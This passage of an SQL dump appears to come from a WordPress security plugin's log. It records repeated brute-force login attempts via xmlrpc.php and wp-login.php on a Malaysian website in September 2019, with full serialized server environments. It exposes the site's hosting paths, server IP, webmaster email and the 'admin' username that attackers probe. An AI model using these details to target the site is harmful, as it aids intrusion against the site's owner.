empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.206.114\";s:11:\"REMOTE_PORT\";s:5:\"59104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHyu1lvzIDnRn6zOHXn8wAAAJE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568797371.5938\";s:12:\"REQUEST_TIME\";s:10:\"1568797371\";}}','notice','2019-09-18 09:02:54','2019-09-18 09:02:52',18258048,19553688,'https://bintara.com.my/xmlrpc.php',1,0,'188.165.206.114'),(24998,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"216.57.225.2\";s:11:\"REMOTE_PORT\";s:5:\"40728\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH0SVlvzIDnRn6zOHXpyQAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568797769.422\";s:12:\"REQUEST_TIME\";s:10:\"1568797769\";}}','notice','2019-09-18 09:09:30','2019-09-18 09:09:29',17740968,19232024,'https://bintara.com.my/wp-login.php',1,0,'216.57.225.2'),(24999,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"216.57.226.2\";s:11:\"REMOTE_PORT\";s:5:\"41814\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH0TG4SfF9g@8lNlxw-YwAAAEE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568797772.6319\";s:12:\"REQUEST_TIME\";s:10:\"1568797772\";}}','notice','2019-09-18 09:09:34','2019-09-18 09:09:33',18258632,19555560,'https://bintara.com.my/xmlrpc.php',1,0,'216.57.226.2'),(25000,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.100.99\";s:11:\"REMOTE_PORT\";s:5:\"57826\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH2OyR0vdvYEIduPCLowgAAARI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568798269.8287\";s:12:\"REQUEST_TIME\";s:10:\"1568798269\";}}','notice','2019-09-18 09:17:51','2019-09-18 09:17:50',17741088,19233320,'https://bintara.com.my/wp-login.php',1,0,'166.62.100.99'),(25001,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.100.99\";s:11:\"REMOTE_PORT\";s:5:\"58800\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH2QFlvzIDnRn6zOHXsXQAAAJg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568798273.0236\";s:12:\"REQUEST_TIME\";s:10:\"1568798273\";}}','notice','2019-09-18 09:17:54','2019-09-18 09:17:53',18257840,19555792,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.100.99'),(25002,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.211.153\";s:11:\"REMOTE_PORT\";s:5:\"36112\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH32VlvzIDnRn6zOHXuowAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568798681.8019\";s:12:\"REQUEST_TIME\";s:10:\"1568798681\";}}','notice','2019-09-18 09:24:43','2019-09-18 09:24:42',17740336,19232200,'https://bintara.com.my/wp-login.php',1,0,'134.209.211.153'),(25003,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.211.153\";s:11:\"REMOTE_PORT\";s:5:\"36854\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH33W4SfF9g@8lNlxxA@AAAAEs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568798685.4784\";s:12:\"REQUEST_TIME\";s:10:\"1568798685\";}}','notice','2019-09-18 09:24:47','2019-09-18 09:24:45',18257840,19553288,'https://bintara.com.my/xmlrpc.php',1,0,'134.209.211.153'),(25004,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.166.18.69\";s:11:\"REMOTE_PORT\";s:5:\"16154\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH5n1lvzIDnRn6zOHXwkgAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568799135.7805\";s:12:\"REQUEST_TIME\";s:10:\"1568799135\";}}','notice','2019-09-18 09:32:19','2019-09-18 09:32:16',17741176,19231744,'https://bintara.com.my/wp-login.php',1,0,'188.166.18.69'),(25005,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.166.18.69\";s:11:\"REMOTE_PORT\";s:5:\"16990\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYH5pW4SfF9g@8lNlxxCFwAAAFE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568799141.1102\";s:12:\"REQUEST_TIME\";s:10:\"1568799141\";}}','notice','2019-09-18 09:32:22','2019-09-18 09:32:21',18258208,19556512,'https://bintara.com.my/xmlrpc.php',1,0,'188.166.18.69'),(25006,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 